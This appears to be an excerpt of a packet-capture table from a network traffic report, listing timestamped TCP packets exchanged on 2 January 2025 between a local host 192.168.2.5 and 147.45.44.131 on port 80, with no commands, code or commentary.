                                                                        Jan 2, 2025 19:14:15.900099039 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.900108099 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.900110006 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.900121927 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.900132895 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.900156975 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.900157928 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.900157928 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.900170088 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.900173903 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.900182962 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.900194883 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.900204897 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.900217056 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.900223017 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.900228977 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.900243998 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.900245905 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.900253057 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.900265932 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.900278091 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.900290012 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.900300980 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.900311947 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.900326967 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.900330067 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.900374889 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.900374889 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.900615931 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.900669098 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.900681973 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.900691986 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.900703907 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.900713921 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.900717020 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.900728941 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.900739908 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.900752068 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.900760889 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.900790930 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.900799990 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.907530069 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.907552004 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.907561064 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.907579899 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.907588959 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.907614946 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.907644987 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.907656908 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.907669067 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.907676935 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.907681942 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.907711983 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.907733917 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.943914890 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.943937063 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.943947077 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.943967104 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.943984985 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.943985939 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.943996906 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.944087982 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.944093943 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.944103956 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.944108009 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.944150925 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.985512972 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.985518932 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.985529900 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.985536098 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.985542059 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.985548019 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.985553026 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.985558987 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.985596895 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.985666037 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.985842943 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.985913992 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.985982895 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.985989094 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.986037016 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.986299038 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.986486912 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.986501932 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.986509085 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.986568928 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.986568928 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.986654997 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.986663103 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.986675024 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.986680984 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.986686945 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.986692905 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.986706018 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.986711025 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.986717939 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.986732960 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.986761093 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.986762047 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.986821890 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.986884117 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.987015009 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987021923 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987032890 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987039089 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987050056 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987063885 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987070084 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987075090 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987076044 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.987082005 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987088919 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987123966 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.987137079 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.987267017 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987272978 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987286091 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987292051 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987298012 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987303019 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987308979 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987323046 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987344980 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.987344980 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.987364054 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.987433910 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987440109 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987446070 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987508059 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.987586021 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987592936 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987598896 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987606049 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987685919 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.987740040 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987754107 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987787008 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.987907887 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987921953 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987927914 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987938881 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987945080 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987957001 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987962961 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987973928 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987987041 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.987993002 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988003969 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988014936 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.988014936 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.988053083 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.988111973 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988126993 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988137960 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988145113 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988195896 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.988195896 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.988282919 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988290071 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988301039 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988321066 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988352060 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.988379955 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.988449097 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988461971 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988468885 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988475084 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988535881 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.988615990 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988622904 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988627911 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988639116 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988643885 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988684893 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.988778114 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988790989 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988797903 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988804102 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988811970 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988847017 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.988847017 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.988934040 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988940954 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988953114 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988959074 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988964081 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988970041 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988976002 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988981962 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.988998890 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.989085913 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.989092112 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.989105940 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.989113092 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.989160061 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.989239931 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.989247084 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.989257097 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.989263058 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.989367008 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.995151043 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.995157957 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.995171070 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.995176077 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.995182991 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.995187998 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.995193958 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:15.995234013 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:15.995268106 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.031095028 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.031102896 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.031116009 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.031121969 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.031128883 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.031150103 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.031239033 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.031245947 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.031245947 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.031321049 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.031419992 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.031532049 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.079631090 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079647064 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079668999 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079683065 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079696894 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079710007 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079718113 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.079731941 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079735994 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.079746962 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079761028 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079765081 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.079766989 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079778910 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079785109 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079790115 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079796076 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079807997 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079809904 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.079813957 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079821110 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079826117 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079830885 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.079832077 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079838037 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079843998 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079854965 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079858065 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.079862118 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079868078 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079874039 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079879999 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079885006 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.079885960 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079891920 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079896927 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079901934 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079902887 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.079915047 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079921007 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079926968 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079931974 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079936981 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.079936981 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.079937935 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079942942 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079948902 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079953909 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079958916 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079965115 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079968929 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.079976082 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079982042 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079982996 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.079993010 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.079999924 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080010891 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080015898 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080020905 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080025911 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080032110 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080032110 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.080032110 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.080038071 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080050945 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080054998 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080060005 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080065966 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080068111 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.080068111 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.080071926 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080079079 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080089092 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080091953 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.080096960 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080101967 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080107927 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080112934 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080117941 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080121994 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.080123901 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080135107 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.080137014 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080142975 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080148935 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080158949 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.080159903 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080167055 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080182076 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080188990 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080194950 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080195904 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.080195904 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.080200911 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080207109 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080210924 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.080214024 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080219030 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080224991 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080229998 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080235958 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080240965 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080246925 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080256939 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080262899 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080264091 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.080264091 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.080270052 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080279112 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080284119 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080288887 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.080293894 CET8049721147.45.44.131192.168.2.5
